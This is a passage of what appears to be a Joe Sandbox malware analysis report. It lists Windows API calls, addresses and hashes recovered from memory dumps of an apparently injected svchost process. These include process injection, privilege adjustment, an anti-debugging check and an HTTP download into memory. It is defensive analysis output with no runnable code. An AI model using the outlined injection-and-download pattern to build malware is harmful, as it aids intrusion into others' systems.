                                                                                                                                                                                • TerminateProcess.KERNEL32(?,00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131452DD
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 1314532F
                                                                                                                                                                                • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,76B7EA30,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000), ref: 13145381
                                                                                                                                                                                • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 131453A7
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453B1
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,000000C1,?,?,?,?,?,?,76B7EA30,00000000,00000000), ref: 131453BA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Process$CreateMemoryWrite$AllocCloseCommandErrorHandleLastLineRemoteTerminateThreadVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3159359046-0
                                                                                                                                                                                • Opcode ID: 1cdf0ba31d3df51b1ca675a12fdd714688cd5e20231d95114aa2ea4851b52865
                                                                                                                                                                                • Instruction ID: 9f4360f81229b30285b795f83172b076a51dca0beb3177dc1979ede44291ec0a
                                                                                                                                                                                • Opcode Fuzzy Hash: 1cdf0ba31d3df51b1ca675a12fdd714688cd5e20231d95114aa2ea4851b52865
                                                                                                                                                                                • Instruction Fuzzy Hash: CD511AB1A00249FFEB11DBA5CD84FAEBBB8EB08744F244529F905E6541E774AA40CB64
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008,131475E5,00000000,?), ref: 1314F303
                                                                                                                                                                                • GdipAlloc.GDIPLUS(00000008), ref: 1314F34C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocGdip
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1856340535-0
                                                                                                                                                                                • Opcode ID: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction ID: 1b3e8c1011e641e1cdb24f2e55c5aaff6d5e64cf1874f51b9794b8ca93c75a3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 90cc83d8c346803ce5d403663a43de7c397794622860fffed05550019d7aa2dd
                                                                                                                                                                                • Instruction Fuzzy Hash: 2751A375F44209ABDF05CFA99984AAEB7B6EFC8300F38847AE044B7240DF745A55CB60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a22aa4305c2437969735b4f63c706147fcbcfb90283b6e929a72bdf4f274c3fe
                                                                                                                                                                                • Instruction ID: 9013d5642ba9b290c7d7ccf9ccdc78394776347b157038a72ed5d1254986133d
                                                                                                                                                                                • Opcode Fuzzy Hash: a22aa4305c2437969735b4f63c706147fcbcfb90283b6e929a72bdf4f274c3fe
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A914972A003149FEB289F7CCC81ABE77EAFB44750F25052AF96597180DB75EC858B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 13153DA0
                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 13153DB5
                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(13142208), ref: 13153DC0
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 13153DDC
                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 13153DE3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                                                                • Opcode ID: 935675d6a9079c6f15d832578c4500ab83153b337d2e4654ff363f27782184c8
                                                                                                                                                                                • Instruction ID: a6ec819b272d0227f2426482cb05374603522a6e20c87f3b779028f3a84bc2f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 935675d6a9079c6f15d832578c4500ab83153b337d2e4654ff363f27782184c8
                                                                                                                                                                                • Instruction Fuzzy Hash: 7621E3B5900326EFD36ADF28D5E4A443BB8FB4970CF10842EF618C3642E3B555818FA5
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00000028,00000000), ref: 13145171
                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,-00000004,000000C0), ref: 13145196
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 131451A3
                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,1314520A), ref: 131451D5
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 131451DB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Token$AdjustCloseErrorHandleLastLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 379965542-0
                                                                                                                                                                                • Opcode ID: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction ID: e3e4a8bb1a1ccb54afa2876179f54043ec6020984c21c5fd6df84cfc700c439a
                                                                                                                                                                                • Opcode Fuzzy Hash: 38711aaf368b1f886249a48ed627c8ddb5286af99ca2571e7505373946fc1082
                                                                                                                                                                                • Instruction Fuzzy Hash: FC010CB5A50259EFEB00EFA5CD49FEEBBBCFB04709F200125E516E2190E7749A448B60
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?), ref: 1314736F
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 13147382
                                                                                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 131473AF
                                                                                                                                                                                • wsprintfA.USER32 ref: 131473D8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Time$CountFileInformationSystemTickZonewsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3771035241-0
                                                                                                                                                                                • Opcode ID: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction ID: f1f2e079070bfaddb8b205531e5151ff7775d2037d7413df33222f54baa3ce7c
                                                                                                                                                                                • Opcode Fuzzy Hash: 0addc934ec445994fa1af9f440de5eea302fbc9d82595a5cc2f4b90946519963
                                                                                                                                                                                • Instruction Fuzzy Hash: 970152B2900219AFEF18EFF4DC85DD93BADEB08258F154062F915E2154DB75E984CFA0
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • CoCreateInstance.OLE32(04003224,00000000,00000001,04003234,00000000,?,040015CC), ref: 040016AB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInstance
                                                                                                                                                                                • String ID: gzip$text
                                                                                                                                                                                • API String ID: 542301482-3625549939
                                                                                                                                                                                • Opcode ID: 1de7f8f95360188960a295ff8dc9034c50a2fce43bd8e08d9c5ecc968754174d
                                                                                                                                                                                • Instruction ID: 18261a129887de51fd7dcfdc5e3ae90c862e261d2310b4e411ac436b30d8b573
                                                                                                                                                                                • Opcode Fuzzy Hash: 1de7f8f95360188960a295ff8dc9034c50a2fce43bd8e08d9c5ecc968754174d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0131DA75A00209EFDB04DF94C894FAEB7B5FB48304F10C159E918AB290C774AA84CF90
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 13152FF9
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315300A
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,1468EFF1,00000104), ref: 13153026
                                                                                                                                                                                • _strcpy_s.LIBCMT ref: 1315303B
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 1315304E
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153057
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153064
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13153091
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530A4
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530B5
                                                                                                                                                                                • _strcat_s.LIBCMT ref: 131530C6
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 131530D7
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,?,00000000,775D4620,00000003,13153159,000000FC,13152882,00000001,00000000,00000000,?,13152F12,?,00000001), ref: 131530F6
                                                                                                                                                                                • _strlen.LIBCMT ref: 13153117
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13153121
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                                                                                                                                                                                • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                • API String ID: 1879448924-4022980321
                                                                                                                                                                                • Opcode ID: 538c471abf18d49cd56a807553f3338373a44b15654f65f96a6d8b675c0a5cd7
                                                                                                                                                                                • Instruction ID: ba6e887fbb9592532475eb507909b79395661962f88f6adccef41f01467c0698
                                                                                                                                                                                • Opcode Fuzzy Hash: 538c471abf18d49cd56a807553f3338373a44b15654f65f96a6d8b675c0a5cd7
                                                                                                                                                                                • Instruction Fuzzy Hash: 973166ABA403166BE61123798D84FAF364C9B172A5F1A0934FE75E30C2FF15E55281F2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(USER32.DLL,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 13154BD4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 13154BF0
                                                                                                                                                                                  • Part of subcall function 131529A0: TlsGetValue.KERNEL32(00000000,13152A15,00000000,13154BB5,00000000,00000000,00000314,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529AD
                                                                                                                                                                                  • Part of subcall function 131529A0: TlsGetValue.KERNEL32(FFFFFFFF,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529C4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C0D
                                                                                                                                                                                  • Part of subcall function 131529A0: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,1468EFD8,131530EF,1468EFD8,Microsoft Visual C++ Runtime Library,00012010), ref: 131529D9
                                                                                                                                                                                  • Part of subcall function 131529A0: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 131529F4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 13154C22
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154C43
                                                                                                                                                                                  • Part of subcall function 13152265: _memset.LIBCMT ref: 131522F1
                                                                                                                                                                                  • Part of subcall function 13152265: IsDebuggerPresent.KERNEL32(?,?,00000000), ref: 1315230F
                                                                                                                                                                                  • Part of subcall function 13152265: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 13152319
                                                                                                                                                                                  • Part of subcall function 13152265: UnhandledExceptionFilter.KERNEL32(1468EFD8,?,?,00000000), ref: 13152323
                                                                                                                                                                                  • Part of subcall function 13152265: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 1315233E
                                                                                                                                                                                  • Part of subcall function 13152265: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 13152345
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(00000000,13153CD0,1315290D,?,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?), ref: 13152A24
                                                                                                                                                                                  • Part of subcall function 13152A17: TlsGetValue.KERNEL32(FFFFFFFF,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A3B
                                                                                                                                                                                  • Part of subcall function 13152A17: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,13152F12,?,00000001,?,131523E7,00000018,13156968,0000000C,13152476,?,?,?,131520C2,0000000E), ref: 13152A50
                                                                                                                                                                                  • Part of subcall function 13152A17: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 13152A6B
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 13154C57
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 13154C6F
                                                                                                                                                                                • __invoke_watson.LIBCMT ref: 13154CE2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                                                                                                                                                                                • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                • API String ID: 2940365033-232180764
                                                                                                                                                                                • Opcode ID: a830648fd4a1c629fa61de16f53efe0184e96fd83ac8a7b94d59be71d99b3b09
                                                                                                                                                                                • Instruction ID: dfc8f3ba4fd6df9083975587692ee10c8c12e7847dc8dc8b3d2360d1c2bc46ca
                                                                                                                                                                                • Opcode Fuzzy Hash: a830648fd4a1c629fa61de16f53efe0184e96fd83ac8a7b94d59be71d99b3b09
                                                                                                                                                                                • Instruction Fuzzy Hash: 9841D376B40315ABCF159FB48D84D9E7BA8EF4A258F2A093EF124F3150DF30A5818B61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • InternetOpenUrlA.WININET(?,00000000,?,00000042,80000200,00000000), ref: 0400140C
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 04001464
                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040014A4
                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000000,00000000), ref: 040014F3
                                                                                                                                                                                • HttpQueryInfoA.WININET(00000000,0000001D,?,00000100,00000000), ref: 04001591
                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,gzip), ref: 040015A7
                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04001624
                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0400162E
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 04001636
                                                                                                                                                                                Strings
                                                                                                                                                                                • gzip, xrefs: 0400159B
                                                                                                                                                                                • Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate, xrefs: 040013E2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.708267706.0000000004000000.00000040.00000400.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4000000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Internet$HttpInfoQueryVirtual$AllocCloseErrorFileFreeHandleLastOpenReadlstrcmpi
                                                                                                                                                                                • String ID: Accept: */*Accept-Language: enAccept-Encoding: gzip, deflate$gzip
                                                                                                                                                                                • API String ID: 1677293161-2863726208
                                                                                                                                                                                • Opcode ID: b6a4f67f2c04c2ae71a405f0e006c58d8ef3130077334d0a550e2d88f4764e53
                                                                                                                                                                                • Instruction ID: 63997b83569fe5eb453668b9df76212b6a902c31a70f2980fe836ae56e0fff1a
                                                                                                                                                                                • Opcode Fuzzy Hash: b6a4f67f2c04c2ae71a405f0e006c58d8ef3130077334d0a550e2d88f4764e53
                                                                                                                                                                                • Instruction Fuzzy Hash: A1711E75904218EBEB65DFA4CC48BEEB7B4BB48305F148199E509BB280DB75AEC4CF50
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00000000,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AE79
                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,,,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEAD
                                                                                                                                                                                • lstrcatA.KERNEL32(?,1314142C,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEB7
                                                                                                                                                                                • lstrcatA.KERNEL32(?,?,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEBF
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141428,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEC9
                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AED1
                                                                                                                                                                                • lstrcatA.KERNEL32(?,13141424,?,1314AF98,00000000,1314C1E9,?,00000000,00000000,?,00000000), ref: 1314AEDB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrcat$lstrlen
                                                                                                                                                                                • String ID: ,
                                                                                                                                                                                • API String ID: 751011610-1078660327
                                                                                                                                                                                • Opcode ID: 8d063c209c05f3c40b290d53618749aae86c4561cc527b284faf3af39faf7822
                                                                                                                                                                                • Instruction ID: 2d473fa946dc4316309682cf5bab062bba16a4a6af7baf30bbb2f6fcee6fc67c
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d063c209c05f3c40b290d53618749aae86c4561cc527b284faf3af39faf7822
                                                                                                                                                                                • Instruction Fuzzy Hash: 2C114C36A0022EEFDF109F64ED408DB3FA5EF042A5B158036F818A6161EB31DD70DEA1
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL,131569C8,0000000C,13152BC8,00000000,00000000,?,?,?,13152A61,?,13152F12,?,00000001,?,131523E7), ref: 13152AC8
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,EncodePointer), ref: 13152AFC
                                                                                                                                                                                • GetProcAddress.KERNEL32(?,DecodePointer), ref: 13152B0C
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(1315AD08), ref: 13152B2E
                                                                                                                                                                                • __lock.LIBCMT ref: 13152B36
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$HandleIncrementInterlockedModule__lock
                                                                                                                                                                                • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                                • API String ID: 3405995401-2843748187
                                                                                                                                                                                • Opcode ID: 29c2cd3d3dea595baed148f36d95434f1a2f5eed951343c799b98d5db5c70684
                                                                                                                                                                                • Instruction ID: bdd58697fcf6b0d5aa352136108c748b5c22594eda4f2e92f2ccc84a88215cd1
                                                                                                                                                                                • Opcode Fuzzy Hash: 29c2cd3d3dea595baed148f36d95434f1a2f5eed951343c799b98d5db5c70684
                                                                                                                                                                                • Instruction Fuzzy Hash: 56114C76A007029FE711AF79D840BEABBF0AF06315F104929F8B997651DB34A902CF61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00000000,00000000,1314D277,00000000,-00000008,00000000,00000000,1314DFE7,00000000,00000000,76B7EA30,1314E1E5,00000000), ref: 13143428
                                                                                                                                                                                • DeleteCriticalSection.KERNEL32 ref: 13143438
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 13143449
                                                                                                                                                                                • OpenThread.KERNEL32(00000001,00000000,00000000), ref: 13143468
                                                                                                                                                                                • TerminateThread.KERNEL32(00000000,00000000), ref: 13143476
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1314347D
                                                                                                                                                                                • Sleep.KERNEL32(000001F4), ref: 13143488
                                                                                                                                                                                • ExitThread.KERNEL32 ref: 13143498
                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 131434A1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$CriticalDeleteExitSection$CloseCurrentHandleOpenProcessSleepTerminate
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3126711353-0
                                                                                                                                                                                • Opcode ID: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction ID: 37a31bfd6f88ac882e859ff3a5f913339fc59731e7e290309411a6c915f0fd73
                                                                                                                                                                                • Opcode Fuzzy Hash: 6574907d64a1d9367c674465d6f8eb0d2fac05f8a3635993c3481088b0551f84
                                                                                                                                                                                • Instruction Fuzzy Hash: 0101A2B1500278AFD309BFA2DEC899A7AA9FB0535CB194939F50693204C7784845CFF2
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 281148d3f13c85d1e5e5d8c5f199cb49ebcef382ed69331147877eb2d37db5b2
                                                                                                                                                                                • Instruction ID: 347a5177cc14affda91ebe3db16af19fc9b1fd4cae495389ec6fa93fff2853fc
                                                                                                                                                                                • Opcode Fuzzy Hash: 281148d3f13c85d1e5e5d8c5f199cb49ebcef382ed69331147877eb2d37db5b2
                                                                                                                                                                                • Instruction Fuzzy Hash: B841C971704316FBD7109B79CF40F6A3A5DDB817BCF784A25B821D51D4EB60E4428A61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                • String ID: L'
                                                                                                                                                                                • API String ID: 536389180-3089082269
                                                                                                                                                                                • Opcode ID: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                • Instruction ID: 5ccda6dff719294e52dc9972e018d76e162f8bde6f1a59f0aee7bd834407432f
                                                                                                                                                                                • Opcode Fuzzy Hash: b0d7ee5c1280d99237a9c6e9605b0dc3947092799fc12b25058896235108e33f
                                                                                                                                                                                • Instruction Fuzzy Hash: 38513075D00309FFCF10CF98C9848AEBBB9BB44364F35866AE569A7191D7309A81CF91
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
                                                                                                                                                                                • StrStrA.SHLWAPI(?,1314CF74,00000000,00000000,?,1314CF73,?), ref: 13151ACD
                                                                                                                                                                                • StrStrA.SHLWAPI(00000002,131414AC), ref: 13151BAE
                                                                                                                                                                                • lstrlenA.KERNEL32(?), ref: 13151BC3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.709677102.0000000013140000.00000040.00000400.00020000.00000000.sdmp, Offset: 13140000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_13140000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen
                                                                                                                                                                                • String ID: %$u
                                                                                                                                                                                • API String ID: 1659193697-272644364
                                                                                                                                                                                • Opcode ID: fbad5abb2e874c339c1d36cb4db215c37bc2f01017c3cd0755d4ce8c287bdbc7
                                                                                                                                                                                • Instruction ID: 3b30c20e63476d411fe8fff1dc5f307cf6bb43daa7a15507a0be19b988553535
                                                                                                                                                                                • Opcode Fuzzy Hash: fbad5abb2e874c339c1d36cb4db215c37bc2f01017c3cd0755d4ce8c287bdbc7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5941C476E0024AAFDB12DF78CD849AEBBB9EF06244B194174F855E7201F734EA44CB61
                                                                                                                                                                                Uniqueness

                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                APIs
